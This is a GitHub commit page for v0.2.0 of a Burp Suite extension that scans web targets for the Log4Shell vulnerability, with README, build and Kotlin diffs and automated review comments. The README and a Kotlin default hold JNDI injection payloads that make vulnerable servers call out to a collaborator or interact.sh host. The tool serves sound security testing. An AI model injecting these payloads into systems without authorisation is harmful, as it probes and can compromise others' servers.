commit v0.2.0
0xDexter0us committed Dec 25, 2021
1 parent 6847c3e commit 83c5178
Showing 116 changed files with 331 additions and 485 deletions.
Binary file removed .gradle/7.1/executionHistory/executionHistory.bin
Binary file removed .gradle/7.1/executionHistory/executionHistory.lock
Binary file removed .gradle/7.1/fileChanges/last-build.bin
Binary file removed .gradle/7.1/fileHashes/fileHashes.bin
Binary file removed .gradle/7.1/fileHashes/fileHashes.lock
Empty file removed .gradle/7.1/gc.properties
Binary file modified .gradle/7.3/executionHistory/executionHistory.bin
Binary file modified .gradle/7.3/executionHistory/executionHistory.lock
Binary file modified .gradle/7.3/fileHashes/fileHashes.bin
Binary file modified .gradle/7.3/fileHashes/fileHashes.lock
Binary file modified .gradle/buildOutputCleanup/buildOutputCleanup.lock
Binary file modified .gradle/buildOutputCleanup/outputFiles.bin
Binary file modified .gradle/file-system.probe
1 change: 1 addition & 0 deletions .idea/gradle.xml

43 changes: 24 additions & 19 deletions README.md
Expand Up @@ -3,14 +3,17 @@
Log4J Scanner
</h1>

<h4 align="center">Burp extension to scan Log4Shell (CVE-2021-44228) vulnerability pre and post auth.</h4>
<h4 align="center">Burp extension to scan Log4Shell (CVE-2021-44228) vulnerability with custom payloads.</h4>

---

<p align="center">
<a href="https://github.com/0xDexter0us/Log4J-Scanner/releases">
<img src="https://img.shields.io/github/release/0xDexter0us/Log4J-Scanner.svg">
</a>
<a href="https://github.com/0xDexter0us/Log4J-Scanner/releases">
<img src="https://img.shields.io/github/downloads/0xDexter0us/Log4J-Scanner/total?label=downloads&logo=github&color=inactive">
</a>
<a href="https://github.com/0xDexter0us/Log4J-Scanner/">
<img src="https://img.shields.io/github/stars/0xDexter0us/Log4J-Scanner.svg?style=social&label=Stars">
</a>
Expand All @@ -31,28 +34,25 @@
> I am not responsible for your actions, burp-suite freezing, target getting hacked, thermonuclear war, or the current economic crisis caused by you following these directions. YOU are choosing to use this tool, and if you point your finger at me for messing anything up, I will LMAO at you.
---
![Log4J-Scanner](https://github.com/0xDexter0us/Log4J-Scanner/images/log4j-scanner.png)
![Usage Gif](https://github.com/0xDexter0us/Log4J-Scanner/images/useage.gif)

## Instructions:
- Add a DNS token from any service you prefer [interact.sh](https://app.interactsh.com), [pipedream](https://pipedream.com), [canarytokens](https://canarytokens.org), [dnslog.cn](https://dnslog.cn) or burp collaborator.
- Either select one of the pre-defined payload or add a custom payload.
- Add custom payload as: `${jndi:ldap://[dnstoken]/[random]` as `dnstoken`and `random` are place-holders, also remember __NOT__ to add `}`closing curly bracket.
- Select location for payload insertion, headers or parameters or both.
- For post-auth scanning add the complete cookie, auth header. Eg: `Authorization: Bearer ya29.m.CvkBAd1XLWYfLkuHFIuOYFCfcGI137rr...`
- Hit **Hack The Planet** button.
- Install the extension either from pre-compiled releases or build from source.
- Disable/Uncheck all other active scanning extensions like active scan++, burp bounty pro, param-miner etc.
- From Top-Menu open settings of Log4J Scanner.
- Add your custom payload and save settings.
- Select your target > right-click > Scan.
- Select `Scan Configuration` > `Select from library`
- Only select `Audit checks - extensions only` and hit OK button.

### Important instructions to remember:
Special thanks to [Silent Signal](https://github.com/silentsignal), instructions and scan configurations are inspired from his extension.

- You'll need [Logger++](https://github.com/nccgroup/LoggerPlusPlus) or [Flow](https://github.com/hvqzao/burp-flow) extension to trace the request triggering the DNS callback.
- Remember to add this extension above [Logger++](https://github.com/nccgroup/LoggerPlusPlus) or [Flow](https://github.com/hvqzao/burp-flow) to track all out going requests.

![Burp-Externder](https://github.com/0xDexter0us/Log4J-Scanner/images/extender.png)

### How to track callbacks:
### Important instructions to remember:
- In your custom payload DO __NOT__ add your collaborator url, just add `[collaborator-server]` as a placeholder,
- `[collaborator-server` will be replaced by your collaborator server url itself.
- Example payload: `"${jndi:ldap://[collaborator-server]/a}`

- Payload triggering callback will contain a 6 character unique ID
- Example payload `${jndi:ldap://example.interact.sh/ABC123` where `ABC123` will be the unique ID
- You can search for this ID in [Logger++](https://github.com/nccgroup/LoggerPlusPlus) or [Flow](https://github.com/hvqzao/burp-flow) to trace the request.

## Download releases
`https://github.com/0xDexter0us/Log4J-Scanner/releases/`
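Review bot: In the added "Important instructions to remember" bullets the placeholder is written inconsistently: the second bullet has `[collaborator-server` without its closing bracket, and the example payload opens with a stray double quote (`"${jndi:ldap://[collaborator-server]/a}`). A user who copies either line may end up with a payload whose token is not substituted or that is malformed. Make both bullets match the default added in Globals.kt, `${jndi:ldap://[collaborator-server]/a}`.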
Expand All @@ -72,17 +72,22 @@
## Resources

- For passive scanning: `https://github.com/f0ng/log4j2burpscanner`
- For active scanning: `https://github.com/albinowax/ActiveScanPlusPlus`
- For active scanning: `https://github.com/albinowax/ActiveScanPlusPlus` & `https://github.com/silentsignal/burp-log4shell`


## Changelog
**25 December 2021 - v0.2.0**
- Added Burp Collaborator api.
- Removed custom scanner.
- Added Burp scanner api.

**13 December 2021 - v.0.1.0**
**13 December 2021 - v0.1.0**
- First public release

## Thanks To

* CoreyD97 - https://github.com/CoreyD97
* Silent Signal - https://github.com/silentsignal


### This was coded be me within a day and is an initial release, bug might occur, bug reports, suggestions and pull requests all are welcome :)
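Review bot: The v0.2.0 changelog entry lists API changes only and does not mention the user-facing options this commit removes from the README: the third-party DNS token services (interact.sh, pipedream, canarytokens, dnslog.cn), the post-auth cookie/header field and the header/parameter location selector. Spell these out next to "Removed custom scanner" so users upgrading from v0.1.0 know what no longer exists.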
4 changes: 1 addition & 3 deletions build.gradle
Expand Up @@ -3,7 +3,7 @@ plugins {
}

group 'com.dexter0us'
version '0.1.0'
version '0.2.0'

repositories {
mavenCentral()
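Review bot: The version bumped at `version '0.2.0'` is also hard-coded in Extension.kt as `const val version = "0.2.0"`, and the jar modified in this same commit is still named `build/libs/Log4J-Scanner-0.1.0.jar`. Derive the displayed version from a single source (for example the jar manifest or a generated resource) so the banner printed on load cannot drift from the build.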
Expand All @@ -14,8 +14,6 @@ dependencies {
implementation 'net.portswigger.burp.extender:burp-extender-api:2.3'
implementation 'com.miglayout:miglayout-core:5.3' //do not update, it will break
implementation 'com.miglayout:miglayout-swing:5.3' //do not update, it will break
implementation 'org.jetbrains.kotlinx:kotlinx-coroutines-core:1.5.2'
implementation 'org.jetbrains.kotlinx:kotlinx-coroutines-swing:1.5.2'
}

task fatJar(type: Jar) {
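Review bot: Both kotlinx-coroutines artifacts are dropped from `dependencies`, but Globals.kt still declares `var currJob: Job? = null` and `extensionUnloaded()` still calls `currJob?.cancel()`. If `Job` is the kotlinx.coroutines type, a clean checkout will not compile. Remove `currJob` and its cancel call in the same commit, or keep `kotlinx-coroutines-core`.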
2 changes: 1 addition & 1 deletion build/kotlin/Log4JScanner010jar-classes.txt
@@ -1 +1 @@
/home/dex/IdeaProjects/Log4J-Scanner/build/classes/kotlin/main/burp/BurpExtender.class:/home/dex/IdeaProjects/Log4J-Scanner/build/classes/kotlin/main/com/dexter0us/log4jScanner/Extension$Companion.class:/home/dex/IdeaProjects/Log4J-Scanner/build/classes/kotlin/main/com/dexter0us/log4jScanner/Extension$UI.class:/home/dex/IdeaProjects/Log4J-Scanner/build/classes/kotlin/main/com/dexter0us/log4jScanner/Extension.class:/home/dex/IdeaProjects/Log4J-Scanner/build/classes/kotlin/main/com/dexter0us/log4jScanner/GlobalsKt$console$1.class:/home/dex/IdeaProjects/Log4J-Scanner/build/classes/kotlin/main/com/dexter0us/log4jScanner/GlobalsKt.class:/home/dex/IdeaProjects/Log4J-Scanner/build/classes/kotlin/main/com/dexter0us/log4jScanner/Log4JScanner$scanner$job$1.class:/home/dex/IdeaProjects/Log4J-Scanner/build/classes/kotlin/main/com/dexter0us/log4jScanner/Log4JScanner.class:/home/dex/IdeaProjects/Log4J-Scanner/build/classes/kotlin/main/com/dexter0us/log4jScanner/Log4JTab$1$1.class:/home/dex/IdeaProjects/Log4J-Scanner/build/classes/kotlin/main/com/dexter0us/log4jScanner/Log4JTab$actionPerformed$1.class:/home/dex/IdeaProjects/Log4J-Scanner/build/classes/kotlin/main/com/dexter0us/log4jScanner/Log4JTab.class:/home/dex/IdeaProjects/Log4J-Scanner/build/classes/kotlin/main/com/dexter0us/log4jScanner/Log4JTabbkp.class:/home/dex/IdeaProjects/Log4J-Scanner/build/classes/kotlin/main/com/dexter0us/log4jScanner/ProcessResult.class
/home/dex/IdeaProjects/Log4J-Scanner/build/classes/kotlin/main/burp/BurpExtender.class:/home/dex/IdeaProjects/Log4J-Scanner/build/classes/kotlin/main/com/dexter0us/log4jScanner/Extension$Companion.class:/home/dex/IdeaProjects/Log4J-Scanner/build/classes/kotlin/main/com/dexter0us/log4jScanner/Extension.class:/home/dex/IdeaProjects/Log4J-Scanner/build/classes/kotlin/main/com/dexter0us/log4jScanner/GlobalsKt$console$1.class:/home/dex/IdeaProjects/Log4J-Scanner/build/classes/kotlin/main/com/dexter0us/log4jScanner/GlobalsKt.class:/home/dex/IdeaProjects/Log4J-Scanner/build/classes/kotlin/main/com/dexter0us/log4jScanner/Log4JScanner$ScanIssue.class:/home/dex/IdeaProjects/Log4J-Scanner/build/classes/kotlin/main/com/dexter0us/log4jScanner/Log4JScanner.class:/home/dex/IdeaProjects/Log4J-Scanner/build/classes/kotlin/main/com/dexter0us/log4jScanner/Log4JUI.class:/home/dex/IdeaProjects/Log4J-Scanner/build/classes/kotlin/main/com/dexter0us/log4jScanner/ProcessResult.class
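Review bot: This file is compiler output under `build/`, and both versions of the line embed the author's absolute local paths (`/home/dex/IdeaProjects/...`). The same commit also changes `.gradle/` caches and a prebuilt jar under `build/libs/`, none of which can be reviewed as a diff or matched to the source by someone loading the jar into Burp. Add `.gradle/` and `build/` to `.gitignore`, remove them from the index, and ship jars only through the releases page the README points to.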
Binary file modified build/kotlin/compileKotlin/build-history.bin
Binary file modified build/kotlin/compileKotlin/caches-jvm/jvm/kotlin/constants.tab
Binary file modified build/kotlin/compileKotlin/caches-jvm/jvm/kotlin/proto.tab
Binary file modified build/kotlin/compileKotlin/caches-jvm/jvm/kotlin/proto.tab.len
Binary file modified build/kotlin/compileKotlin/caches-jvm/jvm/kotlin/proto.tab_i
Binary file modified build/kotlin/compileKotlin/caches-jvm/jvm/kotlin/subtypes.tab
Binary file modified build/kotlin/compileKotlin/caches-jvm/jvm/kotlin/subtypes.tab_i
Binary file modified build/kotlin/compileKotlin/caches-jvm/jvm/kotlin/supertypes.tab
2 changes: 1 addition & 1 deletion build/kotlin/compileKotlin/caches-jvm/lookups/counters.tab
@@ -1,2 +1,2 @@
21
48
0
Binary file modified build/kotlin/compileKotlin/caches-jvm/lookups/file-to-id.tab
Binary file modified build/kotlin/compileKotlin/caches-jvm/lookups/file-to-id.tab.len
Binary file modified build/kotlin/compileKotlin/caches-jvm/lookups/file-to-id.tab_i
Binary file modified build/kotlin/compileKotlin/caches-jvm/lookups/id-to-file.tab
Binary file modified build/kotlin/compileKotlin/caches-jvm/lookups/id-to-file.tab.len
Binary file modified build/kotlin/compileKotlin/caches-jvm/lookups/id-to-file.tab_i
Binary file modified build/kotlin/compileKotlin/caches-jvm/lookups/lookups.tab
Binary file modified build/kotlin/compileKotlin/caches-jvm/lookups/lookups.tab.len
@@ -1 +1 @@
��������̚̚̚
ν™υ¬ό°χ±ζ®ΜšΜšΜšτŸήΝέΕάΘίΛν²Ο°Ο°Ο°Ο°γ²φΈπ¶Β΄ΰµρΉΝ»Ϋ»
Binary file modified build/kotlin/compileKotlin/caches-jvm/lookups/lookups.tab_i
Binary file modified build/kotlin/compileKotlin/last-build.bin
Binary file modified build/libs/Log4J-Scanner-0.1.0.jar
Binary file removed images/extender.png
Binary file removed images/log4j-scanner.png
Binary file added images/useage.gif
47 changes: 35 additions & 12 deletions src/main/kotlin/com/dexter0us/log4jScanner/Extension.kt
Expand Up @@ -3,17 +3,20 @@ package com.dexter0us.log4jScanner
import burp.IBurpExtender
import burp.IBurpExtenderCallbacks
import burp.IExtensionStateListener
import burp.ITab
import java.awt.Component
import java.io.PrintWriter
import javax.swing.*

open class Extension: IBurpExtender, IExtensionStateListener {

companion object{
const val pluginName = "Log4J Scanner"
const val version = "0.1.0"
const val version = "0.2.0"
}

private var scavUnload = false
private var burpMenu: JMenuBar? = null
private var log4jMenu: JMenu? = null

override fun registerExtenderCallbacks(_callbacks: IBurpExtenderCallbacks) {
callbacks = _callbacks
helpers = _callbacks.helpers
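Review bot: `private var scavUnload = false` is only ever written in this diff (set to `true` in `extensionUnloaded()`) and never read, so it looks like a leftover; drop it or use it to guard the menu code. `burpMenu` and `log4jMenu` are declared nullable here and then dereferenced with `!!` in the next hunk, which gives up the safety the nullable type was meant to provide.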
Expand All @@ -22,22 +25,42 @@ open class Extension: IBurpExtender, IExtensionStateListener {

callbacks.apply {
setExtensionName(pluginName)
addSuiteTab(UI())
registerScannerCheck(Log4JScanner())
registerExtensionStateListener { extensionUnloaded() }
}

console("$pluginName v$version Loaded")
stdout.println("$pluginName v$version Loaded")

}
SwingUtilities.invokeLater {
try {
burpMenu = getBurpFrame()!!.jMenuBar
log4jMenu = JMenu("Log4J Scanner")
val listCustomTagsMenu = JMenuItem("Settings")
listCustomTagsMenu.addActionListener { Log4JUI() }
log4jMenu!!.add(listCustomTagsMenu)
burpMenu!!.add(log4jMenu)
} catch (e: Exception) {
e.printStackTrace()
}

}

override fun extensionUnloaded() {
currJob?.cancel()
console("Log4J scanner unloaded.")
}

private inner class UI : ITab{
override fun getTabCaption(): String = "Log4J Scanner"
override fun getUiComponent(): Component = Log4JTab()
private fun getBurpFrame(): JFrame? {
for (frame in JFrame.getFrames()) {
if (frame.isVisible && frame.title.startsWith("Burp Suite")) {
return frame as JFrame?
}
}
return null
}

override fun extensionUnloaded() {
currJob?.cancel()
stdout.println("Log4J scanner unloaded.")
scavUnload = true
burpMenu?.remove(log4jMenu)
burpMenu?.repaint()
}
}
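Review bot: `getBurpFrame()!!.jMenuBar` depends on a visible frame whose title starts with "Burp Suite"; when none matches, the `!!` throws, the `catch` only calls `e.printStackTrace()`, and the extension loads with no Settings entry and nothing written to its own output. Handle the null case explicitly and report it through `stderr`, and use `frame as? JFrame` in `getBurpFrame()`, since `JFrame.getFrames()` returns `Frame` objects and the hard cast can throw. `extensionUnloaded()` also calls `burpMenu?.remove(log4jMenu)` and `repaint()` directly; wrap them in `SwingUtilities.invokeLater` like the code that adds the menu.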
2 changes: 2 additions & 0 deletions src/main/kotlin/com/dexter0us/log4jScanner/Globals.kt
Expand Up @@ -13,6 +13,8 @@ lateinit var stderr: PrintWriter

val console = { str: String -> stdout.println(str) }

var initialPayload = "\${jndi:ldap://[collaborator-server]/a}"

var historySize: Int = 100

var currJob: Job? = null
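Review bot: `initialPayload` is added as a top-level mutable `var`, so any code in the extension can overwrite the default at runtime. If it is only the default shown in the settings dialog, declare it `const val` and hold the user's saved payload separately. A named constant for the `[collaborator-server]` token would also keep this default, the substitution code and the README wording in agreement.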

0 comments on commit 83c5178
